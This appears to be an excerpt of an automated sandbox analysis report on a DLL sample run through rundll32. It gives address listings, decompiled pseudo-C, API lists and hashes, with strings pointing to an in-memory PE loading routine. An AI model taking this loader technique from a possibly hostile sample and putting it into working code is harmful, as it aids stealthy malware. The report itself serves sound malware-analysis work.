                                                                                                        0x100029b5
                                                                                                        0x100029b7
                                                                                                        0x100029c5
                                                                                                        0x100029c5
                                                                                                        0x100029b9
                                                                                                        0x100029b9
                                                                                                        0x100029bd
                                                                                                        0x100029bf
                                                                                                        0x100029bf
                                                                                                        0x100029c7
                                                                                                        0x100029c9
                                                                                                        0x100029cb
                                                                                                        0x100029cb
                                                                                                        0x100029cd
                                                                                                        0x100029d0
                                                                                                        0x100029d0
                                                                                                        0x100029d0
                                                                                                        0x100029d0
                                                                                                        0x100029b0
                                                                                                        0x100029dc
                                                                                                        0x100029e0
                                                                                                        0x100029e4
                                                                                                        0x100029ee
                                                                                                        0x100029f8
                                                                                                        0x100029fa
                                                                                                        0x00000000
                                                                                                        0x10002a00
                                                                                                        0x10002a0a
                                                                                                        0x10002a0e
                                                                                                        0x10002a11
                                                                                                        0x10002a13
                                                                                                        0x10002a15
                                                                                                        0x10002a19
                                                                                                        0x10002a1b
                                                                                                        0x10002a1d
                                                                                                        0x10002a1d
                                                                                                        0x10002a1d
                                                                                                        0x10002a20
                                                                                                        0x10002a22
                                                                                                        0x10002a25
                                                                                                        0x10002a28
                                                                                                        0x10002a2b
                                                                                                        0x10002a2d
                                                                                                        0x00000000
                                                                                                        0x10002a2f
                                                                                                        0x10002a2f
                                                                                                        0x10002a2f
                                                                                                        0x10002a2d
                                                                                                        0x10002a33
                                                                                                        0x10002a37
                                                                                                        0x10002a3b
                                                                                                        0x10002a41
                                                                                                        0x10002a45
                                                                                                        0x10002a47
                                                                                                        0x10002a47
                                                                                                        0x10002a50
                                                                                                        0x10002a55
                                                                                                        0x10002a58
                                                                                                        0x10002a5c
                                                                                                        0x10002a5f
                                                                                                        0x10002a61
                                                                                                        0x10002a63
                                                                                                        0x10002a65
                                                                                                        0x10002a67
                                                                                                        0x10002a6a
                                                                                                        0x10002a6c
                                                                                                        0x10002a6f
                                                                                                        0x10002a72
                                                                                                        0x10002a72
                                                                                                        0x10002a76
                                                                                                        0x10002a76
                                                                                                        0x10002a7a
                                                                                                        0x10002a7d
                                                                                                        0x10002a7d
                                                                                                        0x10002a50
                                                                                                        0x10002a87
                                                                                                        0x10002a8b
                                                                                                        0x10002a8e
                                                                                                        0x10002a90
                                                                                                        0x10002a92
                                                                                                        0x10002a99
                                                                                                        0x10002a9d
                                                                                                        0x10002aa7
                                                                                                        0x10002aa9
                                                                                                        0x10002aab
                                                                                                        0x10002aae
                                                                                                        0x10002ab0
                                                                                                        0x10002ab2
                                                                                                        0x10002ab4
                                                                                                        0x10002ab6
                                                                                                        0x10002ade
                                                                                                        0x10002ade
                                                                                                        0x10002ae3
                                                                                                        0x10002ae7
                                                                                                        0x10002aeb
                                                                                                        0x10002aba
                                                                                                        0x10002ad6
                                                                                                        0x10002ad6
                                                                                                        0x10002aed
                                                                                                        0x10002af0
                                                                                                        0x10002af3
                                                                                                        0x10002af3
                                                                                                        0x10002af8
                                                                                                        0x10002afb
                                                                                                        0x10002afe
                                                                                                        0x10002afe
                                                                                                        0x10002b02
                                                                                                        0x10002b02
                                                                                                        0x10002b06
                                                                                                        0x10002b0c
                                                                                                        0x10002b0f
                                                                                                        0x10002b16
                                                                                                        0x10002b22
                                                                                                        0x10002b24
                                                                                                        0x10002b27
                                                                                                        0x10002b29
                                                                                                        0x10002b30
                                                                                                        0x10002b33
                                                                                                        0x10002b37
                                                                                                        0x10002b3a
                                                                                                        0x10002b3a
                                                                                                        0x10002b3c
                                                                                                        0x10002b3f
                                                                                                        0x10002b41
                                                                                                        0x10002b41
                                                                                                        0x10002b47
                                                                                                        0x10002b4b
                                                                                                        0x10002b4e
                                                                                                        0x10002b52
                                                                                                        0x10002b5f
                                                                                                        0x10002b63
                                                                                                        0x10002b70
                                                                                                        0x10002b74
                                                                                                        0x10002b87
                                                                                                        0x10002b8b
                                                                                                        0x10002b92
                                                                                                        0x10002b94
                                                                                                        0x10002b94
                                                                                                        0x10002b94
                                                                                                        0x10002b76
                                                                                                        0x10002b82
                                                                                                        0x10002b82
                                                                                                        0x10002b65
                                                                                                        0x10002b6c
                                                                                                        0x10002b6c
                                                                                                        0x10002b54
                                                                                                        0x10002b5b
                                                                                                        0x10002b5b
                                                                                                        0x10002b97
                                                                                                        0x10002b9a
                                                                                                        0x10002b9a
                                                                                                        0x10002b41
                                                                                                        0x10002b9e
                                                                                                        0x10002ba1
                                                                                                        0x10002ba4
                                                                                                        0x10002ba4
                                                                                                        0x10002ba8
                                                                                                        0x10002ba8
                                                                                                        0x10002b29
                                                                                                        0x10002bac
                                                                                                        0x10002bb0
                                                                                                        0x10002bb6
                                                                                                        0x10002bba
                                                                                                        0x10002c88
                                                                                                        0x10002c8b
                                                                                                        0x10002c8b
                                                                                                        0x10002c95
                                                                                                        0x10002ca2
                                                                                                        0x10002caf
                                                                                                        0x10002bc0
                                                                                                        0x10002bc0
                                                                                                        0x10002bc4
                                                                                                        0x10002bc7
                                                                                                        0x10002bc7
                                                                                                        0x10002bca
                                                                                                        0x10002bcd
                                                                                                        0x10002bcf
                                                                                                        0x10002bd3
                                                                                                        0x00000000
                                                                                                        0x10002bd9
                                                                                                        0x10002bd9
                                                                                                        0x10002beb
                                                                                                        0x10002bee
                                                                                                        0x10002bf1
                                                                                                        0x10002bf3
                                                                                                        0x10002c16
                                                                                                        0x10002c18
                                                                                                        0x10002c34
                                                                                                        0x10002c34
                                                                                                        0x10002c36
                                                                                                        0x00000000
                                                                                                        0x10002c38
                                                                                                        0x10002c38
                                                                                                        0x10002c38
                                                                                                        0x10002c1a
                                                                                                        0x10002c1a
                                                                                                        0x10002c1c
                                                                                                        0x10002c25
                                                                                                        0x10002c27
                                                                                                        0x00000000
                                                                                                        0x10002c29
                                                                                                        0x10002c29
                                                                                                        0x10002c2b
                                                                                                        0x10002c3f
                                                                                                        0x10002c3f
                                                                                                        0x10002c41
                                                                                                        0x10002c43
                                                                                                        0x10002c45
                                                                                                        0x10002c47
                                                                                                        0x10002c47
                                                                                                        0x10002c45
                                                                                                        0x10002c2d
                                                                                                        0x10002c2d
                                                                                                        0x10002c2d
                                                                                                        0x10002c2b
                                                                                                        0x10002c1e
                                                                                                        0x10002c1e
                                                                                                        0x10002c1e
                                                                                                        0x10002c1c
                                                                                                        0x10002bf5
                                                                                                        0x10002bf5
                                                                                                        0x10002bf7
                                                                                                        0x10002c09
                                                                                                        0x10002c12
                                                                                                        0x10002bf9
                                                                                                        0x10002bfb
                                                                                                        0x10002c03
                                                                                                        0x10002c03
                                                                                                        0x10002bf7
                                                                                                        0x10002c4c
                                                                                                        0x10002c52
                                                                                                        0x10002c54
                                                                                                        0x10002c54
                                                                                                        0x10002c54
                                                                                                        0x10002c69
                                                                                                        0x10002c6d
                                                                                                        0x10002c6f
                                                                                                        0x00000000
                                                                                                        0x10002c75
                                                                                                        0x10002c75
                                                                                                        0x10002c79
                                                                                                        0x00000000
                                                                                                        0x10002c79
                                                                                                        0x10002c6f
                                                                                                        0x00000000
                                                                                                        0x10002c7d
                                                                                                        0x10002c7d
                                                                                                        0x10002c80
                                                                                                        0x10002c80
                                                                                                        0x00000000
                                                                                                        0x10002bc7
                                                                                                        0x10002bba
                                                                                                        0x100029fa
                                                                                                        0x10002992
                                                                                                        0x1000297a
                                                                                                        0x1000297a
                                                                                                        0x10002980
                                                                                                        0x10002980
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetNativeSystemInfo.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 100029DC
                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,00000000,00000000,00000000,00000000), ref: 10002A0A
                                                                                                        • LoadLibraryA.KERNEL32(?,?,?,00000000,00000000,00000000,00000000), ref: 10002A99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocInfoLibraryLoadNativeSystemVirtual
                                                                                                        • String ID: GetNativeSystemInfo$GetProcAddress$LoadLibraryA$NtFlushInstructionCache$VirtualAlloc$VirtualProtect
                                                                                                        • API String ID: 196127654-3342707224
                                                                                                        • Opcode ID: 301a059bc2bc549d91de6fb12f0b4ffd068ff99313271a0feb3f060f1b4fde81
                                                                                                        • Instruction ID: 5dfb657671d6fbadb05f0bb2e96f667a8f58e6f7ebcf66257c9475c971616111
                                                                                                        • Opcode Fuzzy Hash: 301a059bc2bc549d91de6fb12f0b4ffd068ff99313271a0feb3f060f1b4fde81
                                                                                                        • Instruction Fuzzy Hash: 6EC1C072A043478BE714CF14C880B6AB7E1FF84398F1A462CE9859B749EB34ED45CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10029DCE, Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E10029DCE() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				void* _t72;
				intOrPtr _t78;
				signed char* _t81;
				signed int _t83;
				void* _t87;
				signed int _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_push(_t72);
				_push(_t69);
				_push(_t89);
				_t87 = _t72;
				_t1 = _t87 + 0x1c; // 0x10099188
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t87 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t87 + 8; // 0x3
				_t83 =  *_t4;
				if(_t83 >= _t40) {
					L7:
					_t83 = 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t89 = _t21;
						_t22 = _t87 + 0x10; // 0x26a1718
						_t41 =  *_t22;
						if(_t41 != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E10001FC0(_t89, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E10001FC0(_t89, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t87 + 4; // 0x20
							E1003E9B0(_t83, _t70 +  *_t25 * 8, 0, _t89 -  *_t25 << 3);
							 *(_t87 + 4) = _t89;
							 *(_t87 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t87 + 0x10; // 0x26a1718
							_t87 =  *_t23;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v4);
							_push(_t89);
							_t91 = _t94;
							_push(_t72);
							_v28 = 0x100711c0;
							E1003EF44( &_v28, 0x1006718c);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t72);
							_v36 = 0x10071258;
							E1003EF44( &_v36, 0x10067240);
							asm("int3");
							_push(_t92);
							_push(_t72);
							_v44 = 0x100712f0;
							E1003EF44( &_v44, 0x10067284);
							asm("int3");
							_push(4);
							E1003EE82(0x10052ebc, _t69, _t83, _t87);
							_t78 = E10029C33(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000A475(_t78);
							}
							return E1003EF21(_t64);
						}
					} else {
						_t18 = _t87 + 0x10; // 0x26a1718
						_t81 =  *_t18 + 8;
						while(( *_t81 & 0x00000001) != 0) {
							_t83 = _t83 + 1;
							_t81 =  &(_t81[8]);
							if(_t83 < _t40) {
								continue;
							}
							break;
						}
						if(_t83 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x26a1718
					__ecx =  *_t13;
					if(( *( *_t13 + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t87 + 0xc; // 0x3
						if(_t83 >=  *_t30) {
							_t31 = _t83 + 1; // 0x4
							 *((intOrPtr*)(_t87 + 0xc)) = _t31;
						}
						_t33 = _t87 + 0x10; // 0x26a1718
						 *( *_t33 + _t83 * 8) =  *( *_t33 + _t83 * 8) | 0x00000001;
						_t37 = _t83 + 1; // 0x4
						 *(_t87 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t83;
					} else {
						goto L7;
					}
				}
			}































                                                                                                        0x10029dce
                                                                                                        0x10029dcf
                                                                                                        0x10029dd0
                                                                                                        0x10029dd2
                                                                                                        0x10029dd4
                                                                                                        0x10029dd4
                                                                                                        0x10029dd9
                                                                                                        0x10029ddd
                                                                                                        0x10029de3
                                                                                                        0x10029de3
                                                                                                        0x10029de6
                                                                                                        0x10029de6
                                                                                                        0x10029deb
                                                                                                        0x10029dfa
                                                                                                        0x10029dfc
                                                                                                        0x10029dff
                                                                                                        0x10029e1c
                                                                                                        0x10029e1c
                                                                                                        0x10029e1c
                                                                                                        0x10029e1f
                                                                                                        0x10029e1f
                                                                                                        0x10029e24
                                                                                                        0x10029e42
                                                                                                        0x10029e45
                                                                                                        0x10029e53
                                                                                                        0x10029e59
                                                                                                        0x10029e5c
                                                                                                        0x10029e26
                                                                                                        0x10029e29
                                                                                                        0x10029e2f
                                                                                                        0x10029e33
                                                                                                        0x10029e33
                                                                                                        0x10029e64
                                                                                                        0x10029e91
                                                                                                        0x10029e93
                                                                                                        0x10029ea4
                                                                                                        0x10029eac
                                                                                                        0x10029eaf
                                                                                                        0x00000000
                                                                                                        0x10029e66
                                                                                                        0x10029e66
                                                                                                        0x10029e66
                                                                                                        0x10029e6b
                                                                                                        0x10029e75
                                                                                                        0x10029e75
                                                                                                        0x10029e7f
                                                                                                        0x1000833b
                                                                                                        0x1000833c
                                                                                                        0x1000833e
                                                                                                        0x10008348
                                                                                                        0x1000834f
                                                                                                        0x10008354
                                                                                                        0x10008355
                                                                                                        0x10008356
                                                                                                        0x10008358
                                                                                                        0x10008362
                                                                                                        0x10008369
                                                                                                        0x1000836e
                                                                                                        0x1000836f
                                                                                                        0x10008372
                                                                                                        0x1000837c
                                                                                                        0x10008383
                                                                                                        0x10008388
                                                                                                        0x10008389
                                                                                                        0x10008390
                                                                                                        0x1000839f
                                                                                                        0x100083a1
                                                                                                        0x100083a4
                                                                                                        0x100083a8
                                                                                                        0x100083ab
                                                                                                        0x100083ad
                                                                                                        0x100083ad
                                                                                                        0x100083b7
                                                                                                        0x100083b7
                                                                                                        0x10029e01
                                                                                                        0x10029e01
                                                                                                        0x10029e04
                                                                                                        0x10029e07
                                                                                                        0x10029e0c
                                                                                                        0x10029e0d
                                                                                                        0x10029e12
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10029e12
                                                                                                        0x10029e16
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10029e16
                                                                                                        0x10029ded
                                                                                                        0x10029ded
                                                                                                        0x10029ded
                                                                                                        0x10029df4
                                                                                                        0x10029eb2
                                                                                                        0x10029eb2
                                                                                                        0x10029eb5
                                                                                                        0x10029eb7
                                                                                                        0x10029eba
                                                                                                        0x10029eba
                                                                                                        0x10029ebd
                                                                                                        0x10029ec7
                                                                                                        0x10029eca
                                                                                                        0x10029ecd
                                                                                                        0x10029ed0
                                                                                                        0x10029edd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10029df4

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(10099188,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029DDD
                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 10029E33
                                                                                                        • GlobalHandle.KERNEL32(026A1718), ref: 10029E3C
                                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029E45
                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 10029E5C
                                                                                                        • GlobalHandle.KERNEL32(026A1718), ref: 10029E6E
                                                                                                        • GlobalLock.KERNEL32 ref: 10029E75
                                                                                                        • LeaveCriticalSection.KERNEL32(B5E27FEF,?,?,?,?,1009916C,1002A109,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A), ref: 10029E7F
                                                                                                        • GlobalLock.KERNEL32 ref: 10029E8B
                                                                                                        • _memset.LIBCMT ref: 10029EA4
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10029ED0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 496899490-0
                                                                                                        • Opcode ID: e2aeb4303e6fe52247b775f063a3b6ab890ff9ea92d409991ce17d9e381b7827
                                                                                                        • Instruction ID: fc4797414a7a394abe34cb63a57ca90e538edf77d8d5bd3693ebf12f50f76edf
                                                                                                        • Opcode Fuzzy Hash: e2aeb4303e6fe52247b775f063a3b6ab890ff9ea92d409991ce17d9e381b7827
                                                                                                        • Instruction Fuzzy Hash: 3C319C752047069FE720CF34DC99A2A7BE8FF44681B02491DF897D3661EB70F9058B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100406D8, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 156 100406d8-100406f6 HeapCreate 157 100406f8-100406fa 156->157 158 100406fb-10040708 call 1004067d 156->158 161 1004072e-10040731 158->161 162 1004070a-10040717 call 1004094d 158->162 162->161 165 10040719-1004072c HeapDestroy 162->165 165->157
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100406D8(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x100995ac = _t6;
				if(_t6 != 0) {
					_t7 = E1004067D(__eflags);
					__eflags = _t7 - 3;
					 *0x1009b238 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1004094D(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x100995ac);
							 *0x100995ac =  *0x100995ac & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}






                                                                                                        0x100406e9
                                                                                                        0x100406f1
                                                                                                        0x100406f6
                                                                                                        0x100406fb
                                                                                                        0x10040700
                                                                                                        0x10040703
                                                                                                        0x10040708
                                                                                                        0x1004072e
                                                                                                        0x10040730
                                                                                                        0x10040731
                                                                                                        0x1004070a
                                                                                                        0x1004070f
                                                                                                        0x10040714
                                                                                                        0x10040717
                                                                                                        0x00000000
                                                                                                        0x10040719
                                                                                                        0x1004071f
                                                                                                        0x10040725
                                                                                                        0x00000000
                                                                                                        0x10040725
                                                                                                        0x10040717
                                                                                                        0x100406f8
                                                                                                        0x100406f8
                                                                                                        0x100406fa
                                                                                                        0x100406fa

                                                                                                        APIs
                                                                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,1003D0E6,00000001,?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C), ref: 100406E9
                                                                                                        • HeapDestroy.KERNEL32(?,?,00000001,?,?,1003D264,00000001,?,?,1006CD00,0000000C,1003D31E,?), ref: 1004071F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$CreateDestroy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3296620671-0
                                                                                                        • Opcode ID: fc15cafa63722a51272e878c9444c5ba9ecdfe2bbf2f12e2b4a5d471ec9b3ef9
                                                                                                        • Instruction ID: 8de98cd73fa4535f22ee3f226b1f784cd58f7746bd9e7295e4b6b8749b6881f3
                                                                                                        • Opcode Fuzzy Hash: fc15cafa63722a51272e878c9444c5ba9ecdfe2bbf2f12e2b4a5d471ec9b3ef9
                                                                                                        • Instruction Fuzzy Hash: 5FE02234A463139EFB45CB34CD8531A36DCE7406CAF32483AF809E50A0EB7185809F0C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10040028, Relevance: 1.5, APIs: 1, Instructions: 6COMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 166 10040028-1004002e call 1003ff49 168 10040033-10040036 166->168
                                                                                                        C-Code - Quality: 25%
                                                                                                        			E10040028() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1003FF49(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}








                                                                                                        0x10040028
                                                                                                        0x1004002a
                                                                                                        0x1004002c
                                                                                                        0x1004002e
                                                                                                        0x10040036

                                                                                                        APIs
                                                                                                        • _doexit.LIBCMT ref: 1004002E
                                                                                                          • Part of subcall function 1003FF49: __lock.LIBCMT ref: 1003FF57
                                                                                                          • Part of subcall function 1003FF49: __decode_pointer.LIBCMT ref: 1003FF86
                                                                                                          • Part of subcall function 1003FF49: __decode_pointer.LIBCMT ref: 1003FF93
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __decode_pointer$__lock_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 3276244213-0
                                                                                                        • Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                        • Instruction ID: 99ae952869dd9241ed27fa9eb1e3c4814b4a6aeda98446bde58ca606ff6aa815
                                                                                                        • Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
                                                                                                        • Instruction Fuzzy Hash: 6DA00269BD830029F8B191A12C43F6521015B51F02FD400A4BF482C1C1E4C662584057
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 10046C52, Relevance: 66.4, APIs: 44, Instructions: 431COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 403 10046c52-10046c68 404 10046c6f-1004706a call 1004a54c * 44 403->404 405 10046c6a-10046c6e 403->405
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___getlocaleinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937885557-0
                                                                                                        • Opcode ID: 1a586a6a90acfa8746b8b9e095387add2103ae525ea71c5441678218ba0f473b
                                                                                                        • Instruction ID: 999963b8eae7cc5fe2c4e7e3e25b552b5d28efb8de085f77b8a6fedbf883e9bf
                                                                                                        • Opcode Fuzzy Hash: 1a586a6a90acfa8746b8b9e095387add2103ae525ea71c5441678218ba0f473b
                                                                                                        • Instruction Fuzzy Hash: 37E1F3B2D0060DBEEF11CAF1CD81EFF77BDEB48744F14092AB255D2041EA71AA459B64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000A0F4, Relevance: 16.6, APIs: 11, Instructions: 139COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1000A0F4(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E1003EEB5(0x10053117, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000AB19(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000AB19(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E10009C4E(_t84, _t100, __eflags);
					E1000E68D(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
